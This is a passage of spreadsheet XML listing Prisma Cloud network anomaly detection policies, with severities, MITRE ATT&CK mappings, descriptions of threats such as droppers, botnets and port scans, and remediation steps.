      <c r="O1504" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1504" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1504" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1504" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1504" t="inlineStr">
        <is>
          <t>Evasion</t>
        </is>
      </c>
      <c r="T1504" t="b">
        <v>0</v>
      </c>
      <c r="U1504" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1504" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1504" t="inlineStr">
        <is>
          <t>Identifies accepted network traffic from a client host inside your cloud environment to an external server host, using an IP protocol not previously seen in the VPC.</t>
        </is>
      </c>
      <c r="X1504" t="inlineStr">
        <is>
          <t>1. Investigate your client host to determine if the unusual protocol represents unauthorized behavior and the outbound traffic should be blocked.
        2. Review the communication between your client host and the external server host to determine if it conforms with your network policies.</t>
        </is>
      </c>
      <c r="Y1504" t="inlineStr"/>
      <c r="Z1504" t="inlineStr">
        <is>
          <t>unusual_port_proto_network_anomaly</t>
        </is>
      </c>
      <c r="AA1504" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1504" t="inlineStr">
        <is>
          <t>2023-03-17 04:14:05</t>
        </is>
      </c>
      <c r="AC1504" t="inlineStr"/>
      <c r="AD1504" t="b">
        <v>1</v>
      </c>
      <c r="AE1504" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1504" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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4" t="inlineStr">
        <is>
          <t>659a62cd-e5ab-4479-abab-334a61b2918c</t>
        </is>
      </c>
      <c r="AI1504" t="inlineStr">
        <is>
          <t>unusual_port_proto_network_anomaly</t>
        </is>
      </c>
      <c r="AJ1504" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1504" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1505">
      <c r="A1505"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05" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1505" s="2" t="inlineStr"/>
      <c r="D1505" t="inlineStr"/>
      <c r="E1505" t="inlineStr"/>
      <c r="F1505" t="inlineStr"/>
      <c r="G1505" t="b">
        <v>1</v>
      </c>
      <c r="H15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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1505" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1505" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with Dropper activity</t>
        </is>
      </c>
      <c r="L1505" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1505" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1505" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1505" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1505" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1505" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1505" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1505" t="inlineStr">
        <is>
          <t>Exfiltration,Execution,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1505" t="b">
        <v>0</v>
      </c>
      <c r="U1505" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1505" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1505" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (dropper).
        A dropper is a type of Trojan that has been designed to install malware (virus, backdoor, etc.) onto a target system. A dropper is often considered one of the first stages of a compromise, since droppers typically deploy a second stage payload or tool.</t>
        </is>
      </c>
      <c r="X1505"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05" t="inlineStr"/>
      <c r="Z1505" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1505" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1505" t="inlineStr">
        <is>
          <t>2023-07-20 17:27:35</t>
        </is>
      </c>
      <c r="AC1505" t="inlineStr"/>
      <c r="AD1505" t="b">
        <v>1</v>
      </c>
      <c r="AE1505" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1505" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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5" t="inlineStr">
        <is>
          <t>b3ffff3d-16ec-4bf3-8e31-754ff799b271</t>
        </is>
      </c>
      <c r="AI1505" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1505" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1505" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1506">
      <c r="A1506"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06" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1506" s="2" t="inlineStr"/>
      <c r="D1506" t="inlineStr"/>
      <c r="E1506" t="inlineStr"/>
      <c r="F1506" t="inlineStr"/>
      <c r="G1506" t="b">
        <v>1</v>
      </c>
      <c r="H15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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1506" t="inlineStr">
        <is>
          <t>unusual_port_proto_network_anomaly</t>
        </is>
      </c>
      <c r="K1506" t="inlineStr">
        <is>
          <t>Traffic with unusual protocol to a server inside monitored cloud accounts</t>
        </is>
      </c>
      <c r="L1506" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1506" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1506" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1506" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1506" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1506" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1506" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1506" t="inlineStr">
        <is>
          <t>Evasion</t>
        </is>
      </c>
      <c r="T1506" t="b">
        <v>0</v>
      </c>
      <c r="U1506" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1506" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1506" t="inlineStr">
        <is>
          <t>Identifies accepted network traffic from one (external or internal) client host to a server host inside your cloud environment, using an IP protocol not previously seen in the reported VPC.</t>
        </is>
      </c>
      <c r="X1506" t="inlineStr">
        <is>
          <t>1. Investigate your server host to determine if the unusual protocol represents unauthorized behavior and the corresponding service should be shut down.
        2. Review the communication between your server host and the client host to determine if it conforms with your network policies.</t>
        </is>
      </c>
      <c r="Y1506" t="inlineStr"/>
      <c r="Z1506" t="inlineStr">
        <is>
          <t>unusual_port_proto_network_anomaly</t>
        </is>
      </c>
      <c r="AA1506" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1506" t="inlineStr">
        <is>
          <t>2023-03-17 04:14:05</t>
        </is>
      </c>
      <c r="AC1506" t="inlineStr"/>
      <c r="AD1506" t="b">
        <v>1</v>
      </c>
      <c r="AE1506" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1506" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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6" t="inlineStr">
        <is>
          <t>6344aab3-e5ab-4479-abab-19bb647e1718</t>
        </is>
      </c>
      <c r="AI1506" t="inlineStr">
        <is>
          <t>unusual_port_proto_network_anomaly</t>
        </is>
      </c>
      <c r="AJ1506" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1506" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1507">
      <c r="A1507"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07" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1507" s="2" t="inlineStr"/>
      <c r="D1507" t="inlineStr"/>
      <c r="E1507" t="inlineStr"/>
      <c r="F1507" t="inlineStr"/>
      <c r="G1507" t="b">
        <v>1</v>
      </c>
      <c r="H15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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1507" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1507" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with Downloader activity</t>
        </is>
      </c>
      <c r="L1507" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1507" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1507" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1507" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1507" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1507" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1507" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1507" t="inlineStr">
        <is>
          <t>Exfiltration,Execution,Attack Path Rule,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1507" t="b">
        <v>0</v>
      </c>
      <c r="U1507" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1507" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1507" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (downloader).
        The downloader is a type of malware that secretly copies malicious files from a remote server, then installs and executes the files.</t>
        </is>
      </c>
      <c r="X1507"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07" t="inlineStr"/>
      <c r="Z1507" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1507" t="inlineStr">
        <is>
          <t>Vitaliy Stoyko</t>
        </is>
      </c>
      <c r="AB1507" t="inlineStr">
        <is>
          <t>2024-04-23 18:15:29</t>
        </is>
      </c>
      <c r="AC1507" t="inlineStr"/>
      <c r="AD1507" t="b">
        <v>1</v>
      </c>
      <c r="AE1507" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1507" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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7" t="inlineStr">
        <is>
          <t>bc9a976a-906c-4f56-8c0d-c6aa8190304a</t>
        </is>
      </c>
      <c r="AI1507" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1507" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1507" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1508">
      <c r="A1508"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08" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1508" s="2" t="inlineStr"/>
      <c r="D1508" t="inlineStr"/>
      <c r="E1508" t="inlineStr"/>
      <c r="F1508" t="inlineStr"/>
      <c r="G1508" t="b">
        <v>1</v>
      </c>
      <c r="H15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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1508" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1508" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with Botnet activity</t>
        </is>
      </c>
      <c r="L1508" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1508" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1508" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1508" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1508" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1508" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1508" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1508" t="inlineStr">
        <is>
          <t>Attack Path Rule,Initial Access,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1508" t="b">
        <v>0</v>
      </c>
      <c r="U1508" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1508" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1508" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (botnet), is connecting to one of your cloud hosts.
        A botnet is a number of Internet-connected devices, each of which is running one or more bots. Botnets can be used to perform distributed denial-of-service (DDoS) attacks, steal data, send spam, and allows the attacker to access the device and its connection.</t>
        </is>
      </c>
      <c r="X1508"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08" t="inlineStr"/>
      <c r="Z1508" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1508" t="inlineStr">
        <is>
          <t>Vitaliy Stoyko</t>
        </is>
      </c>
      <c r="AB1508" t="inlineStr">
        <is>
          <t>2024-04-23 18:15:36</t>
        </is>
      </c>
      <c r="AC1508" t="inlineStr"/>
      <c r="AD1508" t="b">
        <v>1</v>
      </c>
      <c r="AE1508" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1508" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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8" t="inlineStr">
        <is>
          <t>93f3c7b3-40a7-4393-9f22-11e21d3c7643</t>
        </is>
      </c>
      <c r="AI1508" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1508" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1508" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1509">
      <c r="A1509"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09" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1509" s="2" t="inlineStr"/>
      <c r="D1509" t="inlineStr"/>
      <c r="E1509" t="inlineStr"/>
      <c r="F1509" t="inlineStr"/>
      <c r="G1509" t="b">
        <v>1</v>
      </c>
      <c r="H15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09" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1509" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1509" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with Cryptominer activity</t>
        </is>
      </c>
      <c r="L1509" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING</t>
        </is>
      </c>
      <c r="M1509" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1509" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1509" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1509" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1509" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1509" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1509" t="inlineStr">
        <is>
          <t>Exfiltration,Execution,Attack Path Rule,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1509" t="b">
        <v>0</v>
      </c>
      <c r="U1509" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1509" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1509" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (cryptominer).
        Cryptominer hides on computers or mobile devices to surreptitiously use the machine’s resources to mine cryptocurrencies.</t>
        </is>
      </c>
      <c r="X1509"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09" t="inlineStr"/>
      <c r="Z1509" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1509" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1509" t="inlineStr">
        <is>
          <t>2023-07-20 17:28:55</t>
        </is>
      </c>
      <c r="AC1509" t="inlineStr"/>
      <c r="AD1509" t="b">
        <v>1</v>
      </c>
      <c r="AE1509" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1509" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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09" t="inlineStr">
        <is>
          <t>56948190-3aa1-4d06-a2b5-21f68822b59b</t>
        </is>
      </c>
      <c r="AI1509" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1509" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1509" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1510">
      <c r="A1510" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v10.0 [Deprecated], Matt's ATT&amp;ACK, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B1510" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1510" s="2" t="inlineStr"/>
      <c r="D1510" t="inlineStr"/>
      <c r="E1510" t="inlineStr"/>
      <c r="F1510" t="inlineStr"/>
      <c r="G1510" t="b">
        <v>1</v>
      </c>
      <c r="H15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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1510" t="inlineStr">
        <is>
          <t>unusual_spambot_network_anomaly</t>
        </is>
      </c>
      <c r="K1510" t="inlineStr">
        <is>
          <t>Spambot activity from a server inside monitored cloud accounts</t>
        </is>
      </c>
      <c r="L1510" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING</t>
        </is>
      </c>
      <c r="M1510" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1510" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1510" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1510" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1510" t="inlineStr">
        <is>
          <t>TA0040</t>
        </is>
      </c>
      <c r="R1510" t="inlineStr">
        <is>
          <t>T1496 - Resource Hijacking (TA0040)</t>
        </is>
      </c>
      <c r="S1510" t="inlineStr">
        <is>
          <t>Attack Path Rule,Impact,Resource Misuse</t>
        </is>
      </c>
      <c r="T1510" t="b">
        <v>0</v>
      </c>
      <c r="U1510" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1510" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1510" t="inlineStr">
        <is>
          <t>Identifies a host inside your cloud environment that is generating outbound SMTP traffic and for which no prior mail-related network activity has been observed. This instance may be compromised and sending out spam.</t>
        </is>
      </c>
      <c r="X1510" t="inlineStr">
        <is>
          <t>1. Investigate host activity to uncover other unauthorized behavior and shut down or replace the instance, if required.
        2. The host generating the mail-related traffic may be compromised. We recommend that you investigate for possible malware on this host.</t>
        </is>
      </c>
      <c r="Y1510" t="inlineStr"/>
      <c r="Z1510" t="inlineStr">
        <is>
          <t>unusual_spambot_network_anomaly</t>
        </is>
      </c>
      <c r="AA1510" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1510" t="inlineStr">
        <is>
          <t>2023-06-23 07:08:01</t>
        </is>
      </c>
      <c r="AC1510" t="inlineStr"/>
      <c r="AD1510" t="b">
        <v>1</v>
      </c>
      <c r="AE1510" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1510" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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0" t="inlineStr">
        <is>
          <t>6b4614ef-2347-abe3-7522-445982e4816f</t>
        </is>
      </c>
      <c r="AI1510" t="inlineStr">
        <is>
          <t>unusual_spambot_network_anomaly</t>
        </is>
      </c>
      <c r="AJ1510" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1510" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1511">
      <c r="A1511"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11" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1511" s="2" t="inlineStr"/>
      <c r="D1511" t="inlineStr"/>
      <c r="E1511" t="inlineStr"/>
      <c r="F1511" t="inlineStr"/>
      <c r="G1511" t="b">
        <v>1</v>
      </c>
      <c r="H15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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1511" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1511" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with Rootkit activity</t>
        </is>
      </c>
      <c r="L1511" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1511" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1511" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1511" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1511" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1511" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1511" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1511" t="inlineStr">
        <is>
          <t>Attack Path Rule,AutoFocus Threat,Initial Access</t>
        </is>
      </c>
      <c r="T1511" t="b">
        <v>0</v>
      </c>
      <c r="U1511" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1511" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1511" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (rootkit), is connecting to one of your cloud hosts.
        A rootkit is malware that is designed to infect a target machine and allow an attacker to install a set of tools that grant the attacker persistent remote access to the computer. The malware typically hides deep within the operating system, firmware, and/or driver suite and can evade detection by anti-malware applications and other security tools.</t>
        </is>
      </c>
      <c r="X1511"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11" t="inlineStr"/>
      <c r="Z1511" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1511" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1511" t="inlineStr">
        <is>
          <t>2023-08-04 06:09:47</t>
        </is>
      </c>
      <c r="AC1511" t="inlineStr"/>
      <c r="AD1511" t="b">
        <v>1</v>
      </c>
      <c r="AE1511" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1511" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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1" t="inlineStr">
        <is>
          <t>d3444f40-bd54-4c0e-b7f6-6e0c72c68ce4</t>
        </is>
      </c>
      <c r="AI1511" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1511" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1511" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1512">
      <c r="A1512" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v6.3 [Deprecated], Matt's ATT&amp;ACK, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B1512" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1512" s="2" t="inlineStr"/>
      <c r="D1512" t="n">
        <v>0</v>
      </c>
      <c r="E1512" t="n">
        <v>13</v>
      </c>
      <c r="F1512" t="n">
        <v>505</v>
      </c>
      <c r="G1512" t="b">
        <v>1</v>
      </c>
      <c r="H15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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1512" t="inlineStr">
        <is>
          <t>portscan_network_anomaly</t>
        </is>
      </c>
      <c r="K1512" t="inlineStr">
        <is>
          <t>Port Scan attempt from inside monitored cloud accounts</t>
        </is>
      </c>
      <c r="L1512" t="inlineStr">
        <is>
          <t>DISCOVERY</t>
        </is>
      </c>
      <c r="M1512" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1512" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1512" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1512" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1512" t="inlineStr">
        <is>
          <t>TA0007</t>
        </is>
      </c>
      <c r="R1512" t="inlineStr">
        <is>
          <t>T1046 - Network Service Discovery (TA0007)</t>
        </is>
      </c>
      <c r="S1512" t="inlineStr">
        <is>
          <t>Attack Path Rule,Discovery,Reconnaissance</t>
        </is>
      </c>
      <c r="T1512" t="b">
        <v>0</v>
      </c>
      <c r="U1512" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1512" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1512" t="inlineStr">
        <is>
          <t>Identifies port scan attempts by inspecting the rejected traffic from your cloud environment. A host inside your environment is scanning another host, which might also be located inside or outside. Port scans are a type of discovery attack where a source host is probing a target host across multiple ports, to find out what services are running and to uncover vulnerabilities associated with those services.</t>
        </is>
      </c>
      <c r="X1512" t="inlineStr">
        <is>
          <t>1. Review the list of scanned ports to determine the ones to be closed. Reducing the number of ports available decreases the opportunities for adversaries to compromise your cloud resources.
        2. Please review the source host in the alert as the scan could be an indication of a compromised host.</t>
        </is>
      </c>
      <c r="Y1512" t="inlineStr"/>
      <c r="Z1512" t="inlineStr">
        <is>
          <t>portscan_network_anomaly</t>
        </is>
      </c>
      <c r="AA1512" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1512" t="inlineStr">
        <is>
          <t>2023-06-23 07:08:01</t>
        </is>
      </c>
      <c r="AC1512" t="inlineStr"/>
      <c r="AD1512" t="b">
        <v>1</v>
      </c>
      <c r="AE1512" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1512" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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2" t="inlineStr">
        <is>
          <t>6942bbc2-00a8-5a82-a9d8-30ee647eacaa</t>
        </is>
      </c>
      <c r="AI1512" t="inlineStr">
        <is>
          <t>portscan_network_anomaly</t>
        </is>
      </c>
      <c r="AJ1512" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1512" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1513">
      <c r="A1513"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13" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1513" s="2" t="inlineStr"/>
      <c r="D1513" t="inlineStr"/>
      <c r="E1513" t="inlineStr"/>
      <c r="F1513" t="inlineStr"/>
      <c r="G1513" t="b">
        <v>1</v>
      </c>
      <c r="H15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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1513" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1513" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with Wiper activity</t>
        </is>
      </c>
      <c r="L1513" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1513" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1513" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1513" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1513" t="inlineStr">
        <is>
